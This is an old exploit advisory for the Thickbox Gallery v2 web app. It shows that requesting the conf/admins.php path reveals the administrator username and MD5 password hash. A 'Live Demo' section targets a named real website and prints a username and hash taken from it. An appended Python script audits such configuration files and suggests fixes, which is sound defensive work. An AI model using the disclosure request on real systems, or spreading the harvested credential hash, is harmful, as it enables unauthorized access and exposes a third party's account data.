SirGod

Thickbox Gallery v2 (admins.php) Admin Data Disclosure Vulne

#########################################################################################
[+] Thickbox Gallery v2 Admin Data Disclosure
[+] Discovered By SirGod
[+] MorTal TeaM
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN,kemrayz
##########################################################################################

[+] Arbitrary Admin Data Disclosure

- Go here and you will see the admin data ( login name + crypted password as MD5 )

http://localhost/[Path]/conf/admins.php

- Admin data :

a:1:{s:5:"admin";s:32:"d73ed8a01f624fcb878296bc7ff302bc";}

- Now extract the admin username and the hash :

Username : admin

Password : d73ed8a01f624fcb878296bc7ff302bc

[+] Live Demo

http://www.davilin.com/tbg/conf/admins.php

- Retrieved :

a:1:{s:8:"ytakenak";s:32:"56bd1d32bcb1fbd2609e4d7634febbd1";}

- Name + Password

Username : ytakenak

Password : 56bd1d32bcb1fbd2609e4d7634febbd1


##########################################################################################

# milw0rm.com [2008-08-26]
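For administrators checking their own install, the following is an added example, not part of the original post or of Thickbox Gallery: it parses the PHP-serialized record format shown above from a file's raw bytes and reports whether the file would be returned as-is and whether it holds bare MD5 values. The function names, the constructed sample record, and the `<?php exit; ?>` guard line are assumptions; so is the explanation that the file is readable because it contains no PHP open tag.

```python
import re

ARRAY_START = re.compile(rb'a:(\d+):\{')   # PHP serialize() array header
STR_TOKEN = re.compile(rb's:(\d+):"')      # s:<byte length>:"<value>";
MD5_HEX = re.compile(r'[0-9a-f]{32}')

def parse_admin_record(data: bytes, pos: int = 0) -> dict:
    """Parse a flat PHP-serialized array of string => string pairs."""
    m = ARRAY_START.match(data, pos)
    if not m:
        raise ValueError("not a PHP-serialized array")
    count, pos, items = int(m.group(1)), m.end(), []
    for _ in range(count * 2):              # each entry is a key and a value
        s = STR_TOKEN.match(data, pos)
        if not s:
            raise ValueError("expected string token at offset %d" % pos)
        n, start = int(s.group(1)), s.end()
        if data[start + n:start + n + 2] != b'";':
            raise ValueError("declared length does not match value")
        items.append(data[start:start + n].decode("utf-8", "replace"))
        pos = start + n + 2
    if data[pos:pos + 1] != b"}":
        raise ValueError("unterminated array")
    return dict(zip(items[0::2], items[1::2]))

def audit_conf_file(content: bytes) -> list:
    """Return findings for one file from conf/, given its raw bytes."""
    start = ARRAY_START.search(content)
    if not start:
        return []
    try:
        record = parse_admin_record(content, start.start())
    except ValueError:
        return []
    findings = []
    # Assumption: with no leading PHP tag, the interpreter echoes the file verbatim.
    if not content.lstrip().startswith(b"<?php"):
        findings.append("served-verbatim")
    findings += ["bare-md5:" + u for u, v in record.items() if MD5_HEX.fullmatch(v)]
    return findings

# Constructed sample in the same shape as the record in the post (not a real hash).
SAMPLE = b'a:1:{s:5:"admin";s:32:"' + b"0" * 32 + b'";}'
GUARDED = b"<?php exit; ?>\n" + SAMPLE     # assumed guard line, not from the page
```

A `served-verbatim` finding means the data should move outside the web root or the directory should be denied at the web server; a `bare-md5` finding means the stored password format itself needs replacing with a salted, slow hash.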
